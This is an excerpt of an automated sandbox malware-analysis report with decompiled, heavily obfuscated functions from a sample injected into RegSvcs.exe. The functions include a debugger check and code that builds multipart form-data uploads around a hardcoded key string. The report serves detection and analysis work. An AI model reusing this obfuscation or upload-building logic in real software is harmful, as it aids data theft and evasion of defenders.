											_t150 = (_t158 - _t232) * 0x3c;
										}
									}
									_v16 = _t199;
									_v20 = _t150;
									E004343A0(_t208,  *_t164, 0, 0x80);
									__eflags = 0;
									E004343A0(_t208,  *((intOrPtr*)(_t164 + 4)), 0, 0x80);
									E004343A0(_t208,  *_t208, 0, 0x40);
									E004343A0(_t208,  *((intOrPtr*)(_t208 + 4)), 0, 0x40);
									_t235 = E00448798(_t206, 0);
									_push(_t235);
									_push( *_t208);
									_push( *_t164);
									_push(0x461804);
									E0044B042(_t164, _t199);
									_push(_t235);
									_push( *((intOrPtr*)(_t208 + 4)));
									_push( *((intOrPtr*)(_t164 + 4)));
									_push(0x461858);
									E0044B042(_t164, _t199);
								}
								 *(E0044ABC5()) = _v12;
								 *(E0044ABB9()) = _v16;
								_t149 = E0044ABBF();
								 *_t149 = _v20;
								return _t149;
							}
						}
					}
				} else {
					return E0044A6C3(_a16, _t76, _a4, 0xffffffff, _a12, 0x40, _t76, _t76);
				}
				L72:
			}

0x0044b047
0x0044b051
0x0044b056
0x0044b05b
0x0044b079
0x0044b07a
0x0044b07b
0x0044b07c
0x0044b07d
0x0044b07e
0x0044b083
0x0044b087
0x0044b089
0x0044b08c
0x0044b094
0x0044b09b
0x0044b0a2
0x0044b0a6
0x0044b0a9
0x0044b0ac
0x0044b0b1
0x0044b0b2
0x0044b0b4
0x0044b1d3
0x0044b1d3
0x0044b1d4
0x0044b1d5
0x0044b1d6
0x0044b1d7
0x0044b1d8
0x0044b1dd
0x0044b1e0
0x0044b1e1
0x0044b1e3
0x0044b1ee
0x0044b1f3
0x0044b1f6
0x0044b1f8
0x0044b21a
0x0044b21b
0x0044b21c
0x0044b21d
0x0044b21e
0x0044b21f
0x0044b224
0x0044b227
0x0044b228
0x0044b22a
0x0044b22d
0x0044b22e
0x0044b22f
0x0044b235
0x0044b237
0x0044b23f
0x0044b242
0x0044b247
0x0044b24b
0x0044b24e
0x0044b251
0x0044b257
0x0044b259
0x0044b4ac
0x0044b4ac
0x0044b4ad
0x0044b4ae
0x0044b4af
0x0044b4b0
0x0044b4b1
0x0044b4b6
0x0044b4b9
0x0044b4ba
0x0044b4c2
0x0044b4c9
0x0044b4cc
0x0044b4d9
0x0044b4e0
0x0044b4e1
0x0044b4e5
0x0044b4eb
0x0044b4fd
0x0044b4ff
0x0044b501
0x0044b503
0x0044b513
0x0044b513
0x0044b505
0x0044b505
0x0044b508
0x00000000
0x0044b50a
0x0044b50a
0x0044b50b
0x0044b510
0x0044b508
0x0044b519
0x0044b522
0x0044b523
0x0044b525
0x0044b52c
0x0044b25f
0x0044b263
0x0044b269
0x0044b26b
0x00000000
0x0044b271
0x0044b271
0x0044b276
0x0044b279
0x0044b27b
0x0044b2ae
0x0044b2ae
0x0044b2b0
0x0044b2b3
0x0044b2b3
0x0044b2b6
0x0044b2b9
0x0044b2b9
0x0044b2cf
0x0044b2d2
0x0044b2d4
0x0044b2ea
0x0044b2f0
0x0044b2f2
0x0044b2f8
0x0044b2fb
0x0044b2fb
0x0044b2fe
0x0044b301
0x0044b301
0x0044b311
0x0044b316
0x0044b319
0x0044b31b
0x0044b4aa
0x0044b4aa
0x00000000
0x0044b321
0x0044b321
0x0044b32c
0x0044b33c
0x0044b348
0x0044b355
0x0044b35a
0x0044b35c
0x0044b35e
0x0044b360
0x0044b361
0x0044b366
0x0044b369
0x0044b36d
0x0044b36e
0x0044b36e
0x0044b371
0x0044b373
0x0044b373
0x0044b373
0x0044b376
0x0044b376
0x0044b376
0x0044b37b
0x0044b382
0x0044b385
0x0044b386
0x0044b389
0x0044b38b
0x0044b38b
0x0044b38b
0x0044b395
0x0044b39a
0x0044b39d
0x0044b39d
0x0044b3a3
0x0044b3a6
0x0044b3a6
0x0044b3a9
0x0044b3ac
0x00000000
0x00000000
0x0044b3b1
0x0044b3b5
0x00000000
0x00000000
0x0044b3be
0x0044b3bf
0x0044b3c2
0x0044b3cd
0x0044b3d2
0x0044b3da
0x0044b3e2
0x0044b3e3
0x0044b3e5
0x0044b3e8
0x0044b3eb
0x0044b3ee
0x0044b3f0
0x0044b3f3
0x0044b3f7
0x0044b3f9
0x0044b3fa
0x0044b3fa
0x0044b3fd
0x0044b400
0x00000000
0x00000000
0x0044b402
0x0044b405
0x0044b408
0x0044b40a
0x0044b40c
0x0044b410
0x00000000
0x00000000
0x00000000
0x0044b410
0x0044b412
0x0044b412
0x0044b417
0x0044b418
0x0044b41b
0x0044b422
0x0044b427
0x0044b42f
0x0044b432
0x0044b434
0x0044b437
0x0044b43c
0x0044b43d
0x0044b440
0x0044b444
0x0044b446
0x0044b447
0x0044b447
0x0044b44a
0x00000000
0x00000000
0x0044b44c
0x0044b44f
0x0044b452
0x0044b454
0x0044b457
0x00000000
0x00000000
0x00000000
0x0044b457
0x0044b459
0x0044b459
0x0044b440
0x0044b41b
0x0044b45e
0x0044b45f
0x0044b463
0x0044b465
0x0044b467
0x0044b467
0x0044b46a
0x0044b46f
0x0044b475
0x0044b478
0x0044b47b
0x0044b480
0x0044b482
0x0044b485
0x0044b488
0x0044b489
0x0044b48e
0x0044b491
0x0044b499
0x0044b4a3
0x00000000
0x0044b3b7
0x0044b3b7
0x0044b3b7
0x0044b3a6
0x0044b2d6
0x0044b2d6
0x0044b2d6
0x0044b2d9
0x00000000
0x0044b2de
0x0044b27d
0x0044b27d
0x0044b27f
0x0044b27f
0x0044b282
0x0044b285
0x00000000
0x00000000
0x0044b287
0x0044b28a
0x0044b2a1
0x0044b2a1
0x0044b28c
0x0044b28c
0x0044b290
0x0044b294
0x00000000
0x0044b296
0x0044b296
0x0044b299
0x0044b29c
0x0044b29f
0x00000000
0x00000000
0x00000000
0x00000000
0x0044b29f
0x0044b294
0x0044b2aa
0x0044b2aa
0x0044b2ac
0x0044b2df
0x0044b2e3
0x00000000
0x00000000
0x00000000
0x00000000
0x0044b2ac
0x0044b2a5
0x0044b2a7
0x0044b2a7
0x00000000
0x0044b2a7
0x0044b27b
0x0044b26b
0x0044b1fa
0x0044b217
0x0044b217
0x0044b0ba
0x0044b0be
0x0044b0c3
0x0044b0c4
0x0044b0c6
0x00000000
0x0044b0cc
0x0044b0d0
0x0044b0d5
0x0044b0d6
0x0044b0d8
0x00000000
0x0044b0de
0x0044b0e4
0x0044b0e9
0x0044b0f6
0x0044b0fc
0x0044b0ff
0x0044b105
0x0044b10e
0x0044b10f
0x0044b116
0x0044b11c
0x0044b122
0x0044b125
0x0044b12a
0x0044b12a
0x0044b12c
0x0044b12c
0x0044b12f
0x0044b137
0x0044b149
0x0044b149
0x0044b14b
0x0044b14b
0x0044b139
0x0044b139
0x0044b13e
0x0044b140
0x00000000
0x0044b142
0x0044b144
0x0044b144
0x0044b140
0x0044b152
0x0044b156
0x0044b15d
0x0044b163
0x0044b169
0x0044b173
0x0044b17e
0x0044b188
0x0044b18a
0x0044b18b
0x0044b18d
0x0044b18f
0x0044b194
0x0044b19c
0x0044b19d
0x0044b1a0
0x0044b1a3
0x0044b1a8
0x0044b1ad
0x0044b1b8
0x0044b1c2
0x0044b1c7
0x0044b1cd
0x0044b1d2
0x0044b1d2
0x0044b0d8
0x0044b0c6
0x0044b05d
0x0044b076
0x0044b076
0x00000000

APIs

GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,0044B518,00415ED7,?), ref: 0044B0F6

Part of subcall function 0044A6C3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0044EB2E,?,00000000,-00000008), ref: 0044A76F

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: ByteCharInformationMultiTimeWideZone
String ID:
API String ID: 1123094072-0
Opcode ID: e5e2e0ca9bd43b4809c6742007da9b1dc55621dc180e0fe8774510870c75b08a
Instruction ID: 1e55f926ec39a842520968836540c542be594ea20aa31ba1936fe37b5d344668
Opcode Fuzzy Hash: e5e2e0ca9bd43b4809c6742007da9b1dc55621dc180e0fe8774510870c75b08a
Instruction Fuzzy Hash: B541A571900214BFEB10BF66DC42A9E7BA9EF04394F14406BF914E72A1E778DD109B99

Uniqueness

Uniqueness Score: -1.00%

Function 00446FD5 Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00446FD5(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E00444395(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x00446fe2
0x00446fe4
0x00446fe7
0x00446fea
0x00446fed
0x00446ffe
0x00447000
0x00446fef
0x00446ff3
0x00446ffc
0x00000000
0x00000000
0x00446ffc
0x00447005

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
Instruction ID: f116b1961f0ca13ecf6f0b1f57e6e47648ed14d52fe55b7c49d7dccea76416f3
Opcode Fuzzy Hash: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
Instruction Fuzzy Hash: 61E08C32A11228EBCB15DFC9D904D8AF3FCEB49B14B1140ABB501D3200C678DE40C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 0043B51A Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d158e688373974e53d7bcca44b30f2e6b58c1e80e673c6e96a8a5472a2dd6246
Instruction ID: fb26c6f9a0cca3172d772d55dba5579029bc7f99b5ae34d83f42f4f2f7338af1
Opcode Fuzzy Hash: d158e688373974e53d7bcca44b30f2e6b58c1e80e673c6e96a8a5472a2dd6246
Instruction Fuzzy Hash: 37C08C75000A2096CE298D11B2713AA3364E39A78AFC0248FD60B0B742CB1EEC87DB45

Uniqueness

Uniqueness Score: -1.00%

Function 0041B30D Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0041B30D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _t53;
				intOrPtr _t55;
				intOrPtr _t59;
				signed int _t65;
				intOrPtr _t78;
				signed int _t81;
				void* _t83;
				void* _t85;
				intOrPtr _t86;
				void* _t93;
				signed int _t106;
				intOrPtr _t109;
				signed int _t116;
				signed int _t129;
				intOrPtr* _t144;
				intOrPtr _t146;
				void* _t149;

				_t149 =  &_v52;
				_t144 = _a16;
				_t146 = _a4;
				_v68 = 0xc7df44db;
				_t129 = _v56;
				while(1) {
					_t53 = _v68;
					if(_t53 <= 0xee38ea5b) {
						goto L9;
					}
					L2:
					if(_t53 <= 0x3e0f960b) {
						if(_t53 <= 0x1d456593) {
							if(_t53 == 0xee38ea5c) {
								_t145 = _t146;
								_t83 = E00440010(_a12);
								_t144 = _a16;
								E004338A0(_v44 + _t145, _a12, _t83);
								_t85 = E00440010(_a12);
								_t149 = _t149 + 0x14;
								_t86 = _t85 +  *_t144;
								 *_t144 = _t86;
								 *((short*)(_t146 + _t86)) = 0xa0d;
								_v24 =  *_t144 + 2;
								_v68 = 0x2779a97a;
							} else {
								if(_t53 == 0xf943987a) {
									_v28 = _v52 + _t146;
									_v68 = 0x4112b0b6;
								} else {
									if(_t53 == 0xe65b666) {
										E004338A0(_v28, _a8, E00440010(_a8));
										_t93 = E00440010(_a8);
										_t149 = _t149 + 0x14;
										_v48 = _t93 +  *_t144;
										 *_t144 = _v48;
										_v68 = 0x3e4a0884;
									}
								}
							}
							while(1) {
								_t53 = _v68;
								if(_t53 <= 0xee38ea5b) {
									goto L9;
								}
								goto L2;
							}
							goto L9;
						}
						if(_t53 > 0x2779a979) {
							if(_t53 != 0x34a38934) {
								if(_t53 != 0x2779a97a) {
									continue;
								}
								L78:
								_v68 = _t129;
								_t55 = _v36;
								 *_t144 = _t55;
								return _t55;
							}
							_v64 = 0xb90 + (_v64 * 0x00144000 | 0x0000007b) * 0x9d0;
							_v68 = 0x843cb616;
							continue;
						}
						if(_t53 == 0x1d456594) {
							_v64 = (0x7b + (_v64 >> 3) * 0xd6 >> 0xc) + 0xffffffeb;
							_v68 = 0xdd0bb77c;
							continue;
						}
						if(_t53 != 0x27259bac) {
							continue;
						}
						_t106 = _v64;
						_v64 = _t106 + 0xffffff58;
						_t65 = 0x3e0f960c;
						if((_t106 + 0x52) * (_t106 + 0x52) != (_t106 + 0x52) * (_t106 + 0x52) * 0x2283 - 1) {
							L51:
							_t65 = 0xc6ca9c99;
							goto L67;
						} else {
							L67:
							_v68 = _t65;
							continue;
						}
					}
					if(_t53 <= 0x434ab415) {
						if(_t53 == 0x3e0f960c) {
							_t129 = _t129 * 0xe800;
							E0041B932(0x277b, 0x32d8, _t129, 0x1103, 0x642);
							_t149 = _t149 + 0x14;
							_t65 = 0xae54accb;
							if(_t129 != 0) {
								_t65 = 0x4b2aa835;
							}
							goto L67;
						}
						if(_t53 == 0x3e4a0884) {
							_t109 = _v48;
							 *((char*)(_t146 + _t109 + 4)) = 0xa;
							 *((intOrPtr*)(_t146 + _t109)) = 0xd0a0d22;
							_v68 = 0x1d456594;
							continue;
						}
						if(_t53 != 0x4112b0b6) {
							continue;
						} else {
							_t116 = _v64 * 0x5b;
							_v64 = _t116 - 0x4b >> 0x15;
							_t65 = 0x48c8e998;
							if(_t116 * _t116 != _t116 * _t116 * 0x349d - 1) {
								_t65 = 0xe65b666;
							}
							goto L67;
						}
					}
					if(_t53 > 0x4b2aa834) {
						if(_t53 == 0x4b2aa835) {
							_t129 = (_t129 & 0xffffffe0) + (_t129 & 0xffffffe0) + 0xfffffd20;
							_t65 = 0x805d27a9;
							if(_t129 >= 0x44) {
								_t65 = 0xdcb1a5e3;
							}
							goto L67;
						}
						if(_t53 != 0x6a8b2e08) {
							continue;
						}
						_t129 = (_t129 << 0x00000015 | 0x00036800) * 0xbb;
						_push(_v16);
						_push(_t129);
						_push(0x9d2);
						_push(0x3048);
						_push(0xbb1);
						_push(0x4d91);
						E00412948(_t53);
						_t149 = _t149 + 0x18;
						_t65 = 0xc12d49c2;
						if(_t129 < 0xb7) {
							goto L67;
						}
						goto L51;
					}
					if(_t53 == 0x434ab416) {
						_v64 = 0xf4d43f9b;
						_v68 = 0xc62e58fa;
						continue;
					}
					if(_t53 != 0x48c8e998) {
						continue;
					}
					_t129 = 0xfffefc00 + _t129 * 0x0002d800 & 0xffff8000;
					E00415303(0x2b06, 0x3c87, _t129, 0x1ee2, 0x204c);
					_t149 = _t149 + 0x14;
					_t65 = 0x92b3ab1b;
					if(_t129 < 0x8f) {
						L15:
						_t65 = 0xf943987a;
					} else {
					}
					goto L67;
					L9:
					if(_t53 > 0xc62e58f9) {
						if(_t53 > 0xc7df44da) {
							if(_t53 > 0xdd0bb77b) {
								if(_t53 != 0xdd0bb77c) {
									if(_t53 != 0xdfa2ed8b) {
										continue;
									}
									_t129 = (_t129 << 8) + 0xb700;
									_v56 = _t129;
									E00414F31(0x3639, 0x36e, _t129);
									goto L78;
								}
								_v44 =  *_t144 + 5;
								 *_t144 = _v44;
								_v68 = 0xee38ea5c;
								continue;
							}
							if(_t53 == 0xc7df44db) {
								_push(L"SqDe87817huf871793q74");
								_t59 = E00419FDD();
								_t149 = _t149 + 4;
								_v60 = _t59;
								_v68 = 0xc12d49c2;
								continue;
							}
							if(_t53 != 0xdcb1a5e3) {
								continue;
							}
							_t129 = (_t129 << 7) - _t129 + 0x3375;
							E00412D65(E0040E92D(0x4df3, _t129), 0x2a1f, 0x10ac, _t129, 0x1ab9);
							_t149 = _t149 + 0x18;
							_t65 = 0x843cb616;
							if(_t129 < 0xf7) {
								_t65 = 0xc62e58fa;
							}
							goto L67;
						} else {
							if(_t53 == 0xc62e58fa) {
								_v52 = _v32 + 0x28;
								_v68 = 0x27259bac;
							} else {
								if(_t53 == 0xc6ca9c99) {
									 *_t144 = _v52;
									_v68 = 0xb5047773;
								} else {
									if(_t53 == 0xc7490c87) {
										_t129 = 0x9258 + _t129 * 0xdf;
										_v68 = 0xc6ca9c99;
									}
								}
							}
							continue;
						}
					}
					if(_t53 <= 0xae54acca) {
						if(_t53 == 0x805d27a9) {
							_t129 = _t129 << 0x0000001c | 0x04e00000;
							_t65 = 0xc12d49c2;
							if(_t129 >= 0xf8) {
								_t65 = 0xc517b169;
							}
							goto L67;
						} else {
							if(_t53 == 0x843cb616) {
								E004338A0(_v36, _v60, E00440010(_v60));
								 *_t144 = E00440010(_v60) +  *_t144;
								E004338A0(E00440010(_v60) +  *_t144 + _t146, "\r\nContent-Disposition: form-data; name=\"", 0x28);
								_t149 = _t149 + 0x20;
								_v32 =  *_t144;
								_v68 = 0x434ab416;
							} else {
								if(_t53 == 0x92b3ab1b) {
									_t129 = (_t129 >> 0x00000004 & 0x0ffff800) + 0xfffffa80;
									_v68 = 0xc7490c87;
								}
							}
							continue;
						}
					}
					if(_t53 > 0xc12d49c1) {
						if(_t53 == 0xc12d49c2) {
							_v40 =  *_t144;
							_v68 = 0xc517b169;
						} else {
							if(_t53 == 0xc517b169) {
								 *((short*)(_t146 + _v40)) = 0x2d2d;
								_t78 =  *_t144;
								 *_t144 = _t78 + 2;
								_v36 = _t78 + _t146 + 2;
								_v68 = 0x34a38934;
							}
						}
						continue;
					}
					if(_t53 == 0xae54accb) {
						_t129 = (_t129 << 5) + 0xd40 >> 8;
						_v68 = 0xc517b169;
						continue;
					}
					if(_t53 != 0xb5047773) {
						continue;
					}
					_t81 = _v64;
					_v64 = _t81 + 0xffffff6d;
					_t65 = 0x6a8b2e08;
					if((_t81 - 0x11a) * (_t81 - 0x11a) * 0x83a3 - 1 == (_t81 - 0x11a) * (_t81 - 0x11a)) {
						goto L67;
					}
					goto L15;
				}
			}

0x0041b311
0x0041b314
0x0041b318
0x0041b31c
0x0041b323
0x0041b327
0x0041b327
0x0041b32f
0x00000000
0x00000000
0x0041b331
0x0041b336
0x0041b415
0x0041b5af
0x0041b806
0x0041b813
0x0041b820
0x0041b824
0x0041b82d
0x0041b832
0x0041b835
0x0041b837
0x0041b839
0x0041b845
0x0041b849
0x0041b5b5
0x0041b5ba
0x0041b8db
0x0041b8df
0x0041b5c0
0x0041b5c5
0x0041b5de
0x0041b5e7
0x0041b5ec
0x0041b5f1
0x0041b5f9
0x0041b5fb
0x0041b5fb
0x0041b5c5
0x0041b5ba
0x0041b327
0x0041b327
0x0041b32f
0x00000000
0x00000000
0x00000000
0x0041b32f
0x00000000
0x0041b327
0x0041b420
0x0041b6aa
0x0041b8f0
0x00000000
0x00000000
0x0041b920
0x0041b920
0x0041b924
0x0041b928
0x0041b931
0x0041b931
0x0041b6c6
0x0041b6ca
0x00000000
0x0041b6ca
0x0041b42b
0x0041b712
0x0041b716
0x00000000
0x0041b716
0x0041b436
0x00000000
0x00000000
0x0041b43c
0x0041b452
0x0041b456
0x0041b45d
0x0041b69b
0x0041b69b
0x00000000
0x0041b463
0x0041b7e7
0x0041b7e7
0x00000000
0x0041b7e7
0x0041b45d
0x0041b341
0x0041b4ed
0x0041b7b6
0x0041b7d1
0x0041b7d6
0x0041b7d9
0x0041b7e0
0x0041b7e2
0x0041b7e2
0x00000000
0x0041b7e0
0x0041b4f8
0x0041b8a6
0x0041b8aa
0x0041b8af
0x0041b8b7
0x00000000
0x0041b8b7
0x0041b503
0x00000000
0x0041b509
0x0041b509
0x0041b51e
0x0041b522
0x0041b529
0x0041b52f
0x0041b52f
0x00000000
0x0041b529
0x0041b503
0x0041b34c
0x0041b649
0x0041b782
0x0041b788
0x0041b790
0x0041b792
0x0041b792
0x00000000
0x0041b790
0x0041b654
0x00000000
0x00000000
0x0041b663
0x0041b669
0x0041b66d
0x0041b66e
0x0041b673
0x0041b678
0x0041b67d
0x0041b682
0x0041b687
0x0041b68a
0x0041b695
0x00000000
0x00000000
0x00000000
0x0041b695
0x0041b357
0x0041b769
0x0041b771
0x00000000
0x0041b771
0x0041b362
0x00000000
0x00000000
0x0041b370
0x0041b38b
0x0041b390
0x0041b393
0x0041b39e
0x0041b406
0x0041b406
0x00000000
0x0041b3a0
0x00000000
0x0041b3a5
0x0041b3aa
0x0041b46d
0x0041b53e
0x0041b6db
0x0041b8fd
0x00000000
0x00000000
0x0041b906
0x0041b90c
0x0041b91b
0x00000000
0x0041b91b
0x0041b6e6
0x0041b6ee
0x0041b6f0
0x00000000
0x0041b6f0
0x0041b549
0x0041b722
0x0041b727
0x0041b72c
0x0041b72f
0x0041b733
0x00000000
0x0041b733
0x0041b554
0x00000000
0x00000000
0x0041b563
0x0041b587
0x0041b58c
0x0041b58f
0x0041b59a
0x0041b5a0
0x0041b5a0
0x00000000
0x0041b473
0x0041b478
0x0041b7f6
0x0041b7fa
0x0041b47e
0x0041b483
0x0041b8c7
0x0041b8c9
0x0041b489
0x0041b48e
0x0041b49a
0x0041b4a0
0x0041b4a0
0x0041b48e
0x0041b483
0x00000000
0x0041b478
0x0041b46d
0x0041b3b5
0x0041b4b1
0x0041b79c
0x0041b7a2
0x0041b7ad
0x0041b7af
0x0041b7af
0x00000000
0x0041b4b7
0x0041b4bc
0x0041b86a
0x0041b880
0x0041b88c
0x0041b891
0x0041b896
0x0041b89a
0x0041b4c2
0x0041b4c7
0x0041b4d6
0x0041b4dc
0x0041b4dc
0x0041b4c7
0x00000000
0x0041b4bc
0x0041b4b1
0x0041b3c0
0x0041b60c
0x0041b759
0x0041b75d
0x0041b612
0x0041b617
0x0041b621
0x0041b628
0x0041b62d
0x0041b634
0x0041b638
0x0041b638
0x0041b617
0x00000000
0x0041b60c
0x0041b3cb
0x0041b748
0x0041b74b
0x00000000
0x0041b74b
0x0041b3d6
0x00000000
0x00000000
0x0041b3dc
0x0041b3f5
0x0041b3f9
0x0041b400
0x00000000
0x00000000
0x00000000
0x0041b400

APIs

_strlen.LIBCMT ref: 0041B5D0
_strlen.LIBCMT ref: 0041B5E7
_strlen.LIBCMT ref: 0041B813
_strlen.LIBCMT ref: 0041B82D
_strlen.LIBCMT ref: 0041B859
_strlen.LIBCMT ref: 0041B876

Strings

[8, xrefs: 0041B32A
Content-Disposition: form-data; name=", xrefs: 0041B886
\8, xrefs: 0041B5AA
SqDe87817huf871793q74, xrefs: 0041B722

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: _strlen
String ID: Content-Disposition: form-data; name="$SqDe87817huf871793q74$[8$\8
API String ID: 4218353326-4116915820
Opcode ID: b33d96190c2af9f47596bd2382b0a0296f1963f41d44bd16e85900f28ba3a640
Instruction ID: 9ce60c6f21b19ac58e8133f5e5ccd254fb34179f6299088884408d1f0f4ffc54
Opcode Fuzzy Hash: b33d96190c2af9f47596bd2382b0a0296f1963f41d44bd16e85900f28ba3a640
Instruction Fuzzy Hash: B7D137B1A04305DBD7209F18DC819AEB7E0EB94318F65482FE595CB391D339C9D08B8B

Uniqueness

Uniqueness Score: -1.00%

Function 00403668 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 275
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E00403668(void* __edx, intOrPtr* _a4, WCHAR* _a8, intOrPtr _a12) {
				void* _v16;
				intOrPtr _v20;
				signed int _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				intOrPtr* _v36;
				intOrPtr* _v40;
				signed int _v44;
				WCHAR* _v48;
				intOrPtr _v52;
				intOrPtr _t83;
				signed int _t86;
				signed int _t87;
				unsigned int _t88;
				intOrPtr _t91;
				WCHAR* _t101;
				WCHAR* _t107;
				signed int _t110;
				WCHAR* _t135;
				intOrPtr _t136;
				signed int _t140;
				signed int _t145;
				intOrPtr _t153;

				_t141 = __edx;
				_v20 = 0xa278f3a9;
				_t145 = _v44;
				_t135 = "/";
				while(1) {
					_t83 = _v20;
					if(_t83 > 0xe5de47a8) {
					}
					L2:
					if(_t83 > 0x374609b8) {
						__eflags = _t83 - 0x6310c7a9;
						if(_t83 > 0x6310c7a9) {
							__eflags = _t83 - 0x6310c7aa;
							if(_t83 == 0x6310c7aa) {
								_push(2);
								_push(0x104);
								_t107 = E0043EBC9();
								_t153 = _t153 + 8;
								_v28 = _t107;
								_v48 =  *_a4;
								_v20 = 0x2a071572;
								while(1) {
									_t83 = _v20;
									if(_t83 > 0xe5de47a8) {
									}
									goto L2;
								}
							}
							__eflags = _t83 - 0x75badd0d;
							if(_t83 == 0x75badd0d) {
								_v20 = 0x3e71f9d2;
								while(1) {
									_t83 = _v20;
									if(_t83 > 0xe5de47a8) {
									}
									goto L8;
								}
								goto L2;
							}
							__eflags = _t83 - 0x7ad6c1a2;
							if(__eflags != 0) {
								continue;
							}
							_t110 = E0040AACC(_t141, __eflags, _v32);
							_t153 = _t153 + 4;
							_t136 = 0x81c33858;
							__eflags = _t110;
							if(_t110 != 0) {
								_t136 = 0x3e544020;
							}
							L66:
							_v20 = _t136;
							continue;
						}
						__eflags = _t83 - 0x3e54401f;
						if(_t83 <= 0x3e54401f) {
							__eflags = _t83 - 0x374609b9;
							if(_t83 != 0x374609b9) {
								__eflags = _t83 - 0x3da30a9b;
								if(_t83 != 0x3da30a9b) {
									continue;
								}
								_v44 = _t145;
								return _t83;
							}
							_v24 = 0x67a4 + (_v24 * 4 - 0x1b4 >> 3) * 0xc9;
							_v20 = 0xa9c50648;
						} else {
							__eflags = _t83 - 0x3e544020;
							if(_t83 == 0x3e544020) {
								_v24 = _v24 * 0x3e800000;
								_v20 = 0x6310c7aa;
							} else {
								__eflags = _t83 - 0x3e71f9d2;
								if(_t83 == 0x3e71f9d2) {
									E0040A6C7(_v32, _v36, _v40);
									_t153 = _t153 + 0xc;
									_v52 =  *_v40;
									_v20 = 0xa50e5436;
								}
							}
						}
						continue;
					}
					if(_t83 <= 0xebea008) {
						__eflags = _t83 - 0xe5de47a9;
						if(_t83 == 0xe5de47a9) {
							_v20 = 0xebea009;
						} else {
							__eflags = _t83 - 0xf92e82de;
							if(_t83 == 0xf92e82de) {
								_v24 = (_v24 << 0x12) + 0x100000;
								_v20 = 0x7ad6c1a2;
							} else {
								__eflags = _t83 - 0xd4731c8;
								if(_t83 == 0xd4731c8) {
									_t145 = ((_t145 >> 8) + 0xfffffff1 >> 2) + 0xca;
									_v20 = 0x323dd097;
								}
							}
						}
						continue;
					}
					if(_t83 > 0x2a071571) {
						__eflags = _t83 - 0x2a071572;
						if(_t83 == 0x2a071572) {
							lstrcatW(_v28, _v48);
							lstrcatW(_v28, _t135);
							lstrcatW(_v28,  *(_a4 + 8));
							lstrcatW(_v28, _t135);
							lstrcatW(_v28, _a8);
							_v20 = 0xbd00218a;
							continue;
						}
						__eflags = _t83 - 0x323dd097;
						if(_t83 != 0x323dd097) {
							continue;
						}
						_t145 = (_t145 << 0x0000000b & 0xff800000) + 0xfff91f77;
						__eflags = _t145;
						L44:
						_v20 = 0xc9b0b0db;
					} else {
						if(_t83 == 0xebea009) {
							E0041A37A(_t141, _a12, _v28,  *_v36, _v52);
							E0043F602(_v28);
							E0043F602(_v32);
							_t153 = _t153 + 0x18;
							_v20 = 0xb24e6ef6;
						} else {
							if(_t83 == 0x15e709b8) {
								_v20 = 0xe1ac2d29;
							}
						}
					}
					continue;
					L8:
					__eflags = _t83 - 0xb24e6ef5;
					if(_t83 <= 0xb24e6ef5) {
						__eflags = _t83 - 0xa278f3a8;
						if(_t83 > 0xa278f3a8) {
							__eflags = _t83 - 0xa278f3a9;
							if(_t83 == 0xa278f3a9) {
								_push(_t83);
								_v36 = _t153;
								_v20 = 0xbd7c45c1;
								continue;
							}
							__eflags = _t83 - 0xa50e5436;
							if(_t83 == 0xa50e5436) {
								_t86 = _v24 + 0x42;
								_t87 = _t86 * _t86;
								_t141 = _t87 * 0x6c73 - 1;
								_v24 = _t86 * 0x85 >> 0x10;
								_t136 = 0x8ba133cb;
								__eflags = _t87 * 0x6c73 - 1 - _t87;
								if(_t87 * 0x6c73 - 1 != _t87) {
									_t136 = 0xe5de47a9;
								}
								goto L66;
							}
							__eflags = _t83 - 0xa9c50648;
							if(_t83 == 0xa9c50648) {
								goto L44;
							}
						} else {
							__eflags = _t83 - 0x81c33858;
							if(_t83 == 0x81c33858) {
								_t88 = _v24 * 0x39;
								_t140 = _t88 * _t88;
								_t141 = _t140 * 0x21d5 - 1;
